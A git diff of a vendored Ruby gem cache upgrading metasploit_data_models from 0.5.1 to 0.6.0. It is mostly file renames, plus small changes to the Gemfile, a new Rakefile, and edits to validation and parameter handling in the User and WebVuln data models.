@@ -1,22 +0,0 @@ -require "spec_helper" - -module MetasploitDataModels - describe Base64Serializer do - subject{Base64Serializer.new} - - let(:test_value){{:foo => "bar", :baz => "baz"}} - - # We make it same way as in class b/c hard to keep a reliable base64 - # string literal as a fixture - let(:base64_fixture){[Marshal.dump(test_value)].pack('m')} - - it "should turn a Hash into proper base64" do - subject.dump(test_value).should == base64_fixture - end - - it "should turn base64 back into a Hash" do - subject.load(base64_fixture).should == test_value - end - end -end - diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.gitignore rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.gitignore diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.rspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.rspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.simplecov rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.simplecov diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/.yardopts rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/.yardopts 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile similarity index 79% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile index c4e6b487cb..f153705da3 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/Gemfile +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Gemfile @@ -6,6 +6,9 @@ gemspec # used by dummy application group :development, :test do # supplies factories for producing model instance for specs + # Version 4.1.0 or newer is needed to support generate calls without the 'FactoryGirl.' in factory definitions syntax. + gem 'factory_girl', '>= 4.1.0' + # auto-load factories from spec/factories gem 'factory_girl_rails' # rails is only used for the dummy application in spec/dummy gem 'rails' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/LICENSE rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/LICENSE diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/README.md rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/README.md diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile new file mode 100755 index 0000000000..8fd6dc482f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/Rakefile 
@@ -0,0 +1,34 @@ +#!/usr/bin/env rake +begin + require 'bundler/setup' +rescue LoadError + puts 'You must `gem install bundler` and `bundle install` to run rake tasks' +end + +APP_RAKEFILE = File.expand_path('../spec/dummy/Rakefile', __FILE__) +load 'rails/tasks/engine.rake' + +Bundler::GemHelper.install_tasks + +# +# load rake files like a normal rails app +# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl +# + +pathname = Pathname.new(__FILE__) +root = pathname.parent +rakefile_glob = root.join('lib', 'tasks', '**', '*.rake').to_path + +Dir.glob(rakefile_glob) do |rakefile| + load rakefile +end + +require 'rspec/core' +require 'rspec/core/rake_task' + +# Depend on app:db:test:prepare so that test database is recreated just like in a full rails app +# @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl +RSpec::Core::RakeTask.new(:spec => 'app:db:test:prepare') + +task :default => :spec + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/api_key.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/api_key.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/client.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/client.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploit_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploit_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/exploited_host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/exploited_host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/host_tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/host_tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/imported_cred.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/imported_cred.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/listener.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/listener.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/loot.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/loot.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/macro.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/macro.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/mod_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/mod_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_action.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_action.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_arch.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_arch.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_author.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_author.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_mixin.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_mixin.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_platform.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_platform.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/module_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/module_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/nexpose_console.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/nexpose_console.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/note.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/note.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/profile.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/profile.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/report_template.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/report_template.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/route.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/route.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/service.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/service.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/session_event.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/session_event.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/tag.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/tag.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/task.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/task.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb similarity index 87% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb index bdc5baae21..c727f8507f 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/user.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/user.rb @@ -20,13 +20,6 @@ class Mdm::User < ActiveRecord::Base serialized_prefs_attr_accessor :time_zone, :session_key serialized_prefs_attr_accessor :last_login_address # specifically NOT last_login_ip to prevent confusion with AuthLogic magic columns (which dont work for serialized fields) - # - # Validations - # - - validates :password, :password_is_strong => true - validates :password_confirmation, :password_is_strong => true - ActiveSupport.run_load_hooks(:mdm_user, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_attempt.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_attempt.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_detail.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_detail.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/vuln_ref.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/vuln_ref.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_form.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_form.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_page.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_page.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_site.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_site.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb
similarity index 72%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb
index 4577818842..5d9df893c7 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/web_vuln.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/web_vuln.rb
@@ -1,6 +1,6 @@
 # A Web Vulnerability found during a web scan or web audit.
 #
-# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) in side an initializer so that
+# If you need to modify Mdm::WebVuln you can use ActiveSupport.on_load(:mdm_web_vuln) inside an initializer so that
 # your patches are reloaded on each request in development mode for your Rails application.
 #
 # @example extending Mdm::WebVuln
@@ -19,6 +19,9 @@ class Mdm::WebVuln < ActiveRecord::Base # shouldn't be an {Mdm::WebVuln} record if there is 0% {#confidence} in the the finding. CONFIDENCE_RANGE = 1 .. 100 + # Default value for {#params} + DEFAULT_PARAMS = [] + # Allowed {#method methods}. METHODS = [ 'GET', @@ -120,7 +123,6 @@ class Mdm::WebVuln < ActiveRecord::Base } validates :name, :presence => true validates :path, :presence => true - validates :params, :presence => true validates :pname, :presence => true validates :proof, :presence => true validates :risk, @@ -136,8 +138,53 @@ class Mdm::WebVuln < ActiveRecord::Base # @!attribute [rw] params # Parameters sent as part of request # - # @return [Array>] Array of parameter key value pairs - serialize :params, MetasploitDataModels::Base64Serializer.new + # @return [Array>] Array of parameter key value pairs + serialize :params, MetasploitDataModels::Base64Serializer.new(:default => DEFAULT_PARAMS) + + # + # Methods + # + + # Parameters sent as part of request. + # + # @return [Array>] + def params + normalize_params( + read_attribute(:params) + ) + end + + # Set parameters sent as part of request. + # + # @param params [Array>, nil] Array of parameter key value pairs + # @return [void] + def params=(params) + write_attribute( + :params, + normalize_params(params) + ) + end + + private + + # Creates a duplicate of {DEFAULT_PARAMS} that is safe to modify. + # + # @return [Array] an empty array + def default_params + DEFAULT_PARAMS.dup + end + + # Returns either the given params or {DEFAULT_PARAMS} if params is `nil` + # + # @param [Array>, nil] params + # @return [Array<>] params if not `nil` + # @return [nil] if params is `nil` + def normalize_params(params) + params || default_params + end + + # switch back to public for load hooks + public ActiveSupport.run_load_hooks(:mdm_web_vuln, self) end 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb
similarity index 100%
